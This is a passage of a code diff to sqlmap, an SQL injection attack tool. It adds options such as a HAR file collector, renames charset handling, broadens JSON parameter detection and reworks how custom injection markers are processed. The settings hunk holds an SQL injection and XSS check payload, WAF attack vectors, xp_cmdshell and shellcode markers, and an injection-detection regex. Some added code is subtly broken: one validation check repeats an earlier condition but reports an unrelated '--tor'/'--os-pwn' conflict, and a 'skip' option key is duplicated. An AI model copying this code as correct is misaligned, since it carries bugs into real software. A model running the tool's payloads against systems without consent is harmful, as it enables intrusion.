kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
|
||||
@@ -1901,6 +1919,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.dnsMode = False
|
||||
kb.dnsTest = None
|
||||
kb.docRoot = None
|
||||
kb.droppingRequests = False
|
||||
kb.dumpColumns = None
|
||||
kb.dumpTable = None
|
||||
kb.dumpKeyboardInterrupt = False
|
||||
@@ -1920,6 +1939,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.futileUnion = None
|
||||
kb.headersFp = {}
|
||||
kb.heuristicDbms = None
|
||||
kb.heuristicExtendedDbms = None
|
||||
kb.heuristicMode = False
|
||||
kb.heuristicPage = False
|
||||
kb.heuristicTest = None
|
||||
@@ -2009,6 +2029,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.tableExistsChoice = None
|
||||
kb.uChar = NULL
|
||||
kb.unionDuplicates = False
|
||||
kb.wafSpecificResponse = None
|
||||
kb.xpCmdshellAvailable = False
|
||||
|
||||
if flushAll:
|
||||
@@ -2224,6 +2245,12 @@ def _setTrafficOutputFP():
|
||||
|
||||
conf.trafficFP = openFile(conf.trafficFile, "w+")
|
||||
|
||||
def _setupHTTPCollector():
|
||||
if not conf.harFile:
|
||||
return
|
||||
|
||||
conf.httpCollector = HTTPCollectorFactory(conf.harFile).create()
|
||||
|
||||
def _setDNSServer():
|
||||
if not conf.dnsDomain:
|
||||
return
|
||||
@@ -2353,8 +2380,8 @@ def _basicOptionValidation():
|
||||
|
||||
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
|
||||
isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
|
||||
errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
|
||||
isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
|
||||
@@ -2401,6 +2428,10 @@ def _basicOptionValidation():
|
||||
errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.notString and conf.nullConnection:
|
||||
errMsg = "option '--tor' is incompatible with switch '--os-pwn'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.noCast and conf.hexConvert:
|
||||
errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
@@ -2546,15 +2577,15 @@ def _basicOptionValidation():
|
||||
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.charset:
|
||||
_ = checkCharEncoding(conf.charset, False)
|
||||
if conf.encoding:
|
||||
_ = checkCharEncoding(conf.encoding, False)
|
||||
if _ is None:
|
||||
errMsg = "unknown charset '%s'. Please visit " % conf.charset
|
||||
errMsg = "unknown charset '%s'. Please visit " % conf.encoding
|
||||
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
|
||||
errMsg += "supported charsets"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
else:
|
||||
conf.charset = _
|
||||
conf.encoding = _
|
||||
|
||||
if conf.loadCookies:
|
||||
if not os.path.exists(conf.loadCookies):
|
||||
@@ -2600,6 +2631,7 @@ def init():
|
||||
_setTamperingFunctions()
|
||||
_setWafFunctions()
|
||||
_setTrafficOutputFP()
|
||||
_setupHTTPCollector()
|
||||
_resolveCrossReferences()
|
||||
_checkWebSocket()
|
||||
|
||||
|
||||
@@ -38,7 +38,7 @@ optDict = {
|
||||
"authType": "string",
|
||||
"authCred": "string",
|
||||
"authFile": "string",
|
||||
"ignore401": "boolean",
|
||||
"ignoreCode": "integer",
|
||||
"ignoreProxy": "boolean",
|
||||
"ignoreRedirects": "boolean",
|
||||
"ignoreTimeouts": "boolean",
|
||||
@@ -77,8 +77,8 @@ optDict = {
|
||||
"testParameter": "string",
|
||||
"skip": "string",
|
||||
"skipStatic": "boolean",
|
||||
"skip": "string",
|
||||
"paramExclude": "string",
|
||||
"dbms": "string",
|
||||
"dbmsCred": "string",
|
||||
"os": "string",
|
||||
"invalidBignum": "boolean",
|
||||
@@ -196,14 +196,17 @@ optDict = {
|
||||
"batch": "boolean",
|
||||
"binaryFields": "string",
|
||||
"charset": "string",
|
||||
"checkInternet": "boolean",
|
||||
"crawlDepth": "integer",
|
||||
"crawlExclude": "string",
|
||||
"csvDel": "string",
|
||||
"dumpFormat": "string",
|
||||
"encoding": "string",
|
||||
"eta": "boolean",
|
||||
"flushSession": "boolean",
|
||||
"forms": "boolean",
|
||||
"freshQueries": "boolean",
|
||||
"harFile": "string",
|
||||
"hexConvert": "boolean",
|
||||
"outputDir": "string",
|
||||
"parseErrors": "boolean",
|
||||
|
||||
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||
from lib.core.enums import OS
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.1.5.0"
|
||||
VERSION = "1.1.10.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -67,6 +67,7 @@ BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||
SLEEP_TIME_MARKER = "[SLEEPTIME]"
|
||||
INFERENCE_MARKER = "[INFERENCE]"
|
||||
|
||||
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
||||
CHAR_INFERENCE_MARK = "%c"
|
||||
@@ -175,6 +176,9 @@ INFERENCE_UNKNOWN_CHAR = '?'
|
||||
# Character used for operation "greater" in inference
|
||||
INFERENCE_GREATER_CHAR = ">"
|
||||
|
||||
# Character used for operation "greater or equal" in inference
|
||||
INFERENCE_GREATER_EQUALS_CHAR = ">="
|
||||
|
||||
# Character used for operation "equals" in inference
|
||||
INFERENCE_EQUALS_CHAR = "="
|
||||
|
||||
@@ -295,7 +299,7 @@ BLANK = "<blank>"
|
||||
CURRENT_DB = "CD"
|
||||
|
||||
# Regular expressions used for finding file paths in error messages
|
||||
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||
|
||||
# Regular expressions used for parsing error messages (--parse-errors)
|
||||
ERROR_PARSING_REGEXES = (
|
||||
@@ -366,7 +370,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
|
||||
CUSTOM_INJECTION_MARK_CHAR = '*'
|
||||
|
||||
# Other way to declare injection position
|
||||
INJECT_HERE_MARK = '%INJECT HERE%'
|
||||
INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'
|
||||
|
||||
# Minimum chunk length used for retrieving data over error based payloads
|
||||
MIN_ERROR_CHUNK_LENGTH = 8
|
||||
@@ -453,6 +457,9 @@ LOW_TEXT_PERCENT = 20
|
||||
# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
|
||||
IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")
|
||||
|
||||
# Keywords expected to be in UPPERCASE in getValue()
|
||||
GET_VALUE_UPPERCASE_KEYWORDS = ("SELECT", "FROM", "WHERE", "DISTINCT", "COUNT")
|
||||
|
||||
LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
|
||||
|
||||
# After this number of misses reflective removal mechanism is turned off (for speed up reasons)
|
||||
@@ -475,7 +482,7 @@ DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\
|
||||
# Extensions skipped by crawler
|
||||
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
|
||||
|
||||
# Patterns often seen in HTTP headers containing custom injection marking character
|
||||
# Patterns often seen in HTTP headers containing custom injection marking character '*'
|
||||
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
|
||||
|
||||
# Template used for common table existence check
|
||||
@@ -490,6 +497,12 @@ IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")
|
||||
# Data inside shellcodeexec to be filled with random string
|
||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
|
||||
# Generic address for checking the Internet connection while using switch --check-internet
|
||||
CHECK_INTERNET_ADDRESS = "http://ipinfo.io/"
|
||||
|
||||
# Value to look for in response to CHECK_INTERNET_ADDRESS
|
||||
CHECK_INTERNET_VALUE = "IP Address Details"
|
||||
|
||||
# Vectors used for provoking specific WAF/IPS/IDS behavior(s)
|
||||
WAF_ATTACK_VECTORS = (
|
||||
"", # NIL
|
||||
@@ -624,7 +637,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||
|
||||
# Boldify all logger messages containing these "patterns"
|
||||
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
|
||||
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response")
|
||||
|
||||
# Generic www root directory names
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||
@@ -663,7 +676,7 @@ INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
|
||||
XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
|
||||
|
||||
# Regular expression used for detecting JSON POST data
|
||||
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
|
||||
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null).*\}\s*(\]\s*)*\Z'
|
||||
|
||||
# Regular expression used for detecting JSON-like POST data
|
||||
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
|
||||
|
||||
@@ -9,6 +9,8 @@ import codecs
|
||||
import functools
|
||||
import os
|
||||
import re
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
import urlparse
|
||||
@@ -18,6 +20,7 @@ from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import intersect
|
||||
from lib.core.common import isNumPosStrValue
|
||||
from lib.core.common import normalizeUnicode
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import paramToDict
|
||||
@@ -49,7 +52,6 @@ from lib.core.option import _setKnowledgeBaseAttributes
|
||||
from lib.core.option import _setAuthCred
|
||||
from lib.core.settings import ASTERISK_MARKER
|
||||
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
||||
@@ -111,14 +113,14 @@ def _setRequestParams():
|
||||
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
||||
else:
|
||||
break
|
||||
if CUSTOM_INJECTION_MARK_CHAR in retVal:
|
||||
hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
|
||||
if kb.customInjectionMark in retVal:
|
||||
hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group("name")))
|
||||
return retVal
|
||||
|
||||
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
|
||||
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
|
||||
if kb.processUserMarks is None and kb.customInjectionMark in conf.data:
|
||||
message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
|
||||
message += "'--data'. Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y')
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
@@ -128,81 +130,91 @@ def _setRequestParams():
|
||||
if kb.processUserMarks:
|
||||
kb.testOnlyCustom = True
|
||||
|
||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y')
|
||||
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'N':
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]*)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
|
||||
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||
_ = match.group(2)
|
||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
|
||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
|
||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'N':
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "JSON-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data)
|
||||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data)
|
||||
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'N':
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % kb.customInjectionMark, conf.data)
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'N':
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % kb.customInjectionMark), conf.data)
|
||||
|
||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||
message = "Multipart-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'N':
|
||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||
message = "Multipart-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.MULTIPART
|
||||
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"']?(?P<name>[^\"'\r\n]+)[\"']?).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % kb.customInjectionMark), conf.data)
|
||||
|
||||
kb.postHint = POST_HINT.MULTIPART
|
||||
|
||||
if not kb.postHint:
|
||||
if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed
|
||||
if kb.customInjectionMark in conf.data: # later processed
|
||||
pass
|
||||
else:
|
||||
place = PLACE.POST
|
||||
@@ -214,12 +226,12 @@ def _setRequestParams():
|
||||
conf.paramDict[place] = paramDict
|
||||
testableParameters = True
|
||||
else:
|
||||
if CUSTOM_INJECTION_MARK_CHAR not in conf.data: # in case that no usable parameter values has been found
|
||||
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
|
||||
conf.parameters[PLACE.POST] = conf.data
|
||||
|
||||
kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
|
||||
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
|
||||
|
||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
|
||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
|
||||
warnMsg = "you've provided target URL without any GET "
|
||||
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
|
||||
warnMsg += "and without providing any POST parameters "
|
||||
@@ -233,15 +245,15 @@ def _setRequestParams():
|
||||
if choice == 'Q':
|
||||
raise SqlmapUserQuitException
|
||||
elif choice == 'Y':
|
||||
conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR)
|
||||
conf.url = "%s%s" % (conf.url, kb.customInjectionMark)
|
||||
kb.processUserMarks = True
|
||||
|
||||
for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):
|
||||
_ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
|
||||
if CUSTOM_INJECTION_MARK_CHAR in _:
|
||||
if kb.customInjectionMark in _:
|
||||
if kb.processUserMarks is None:
|
||||
lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'}
|
||||
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
|
||||
message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
|
||||
message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place]
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
@@ -253,7 +265,7 @@ def _setRequestParams():
|
||||
if kb.processUserMarks:
|
||||
kb.testOnlyCustom = True
|
||||
|
||||
if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
|
||||
if "=%s" % kb.customInjectionMark in _:
|
||||
warnMsg = "it seems that you've provided empty parameter value(s) "
|
||||
warnMsg += "for testing. Please, always use only valid parameter values "
|
||||
warnMsg += "so sqlmap could be able to run properly"
|
||||
@@ -285,13 +297,13 @@ def _setRequestParams():
|
||||
if place == PLACE.CUSTOM_HEADER:
|
||||
for index in xrange(len(conf.httpHeaders)):
|
||||
header, value = conf.httpHeaders[index]
|
||||
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value):
|
||||
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
|
||||
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value):
|
||||
parts = value.split(kb.customInjectionMark)
|
||||
for i in xrange(len(parts) - 1):
|
||||
conf.paramDict[place]["%s #%d%s" % (header, i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))))
|
||||
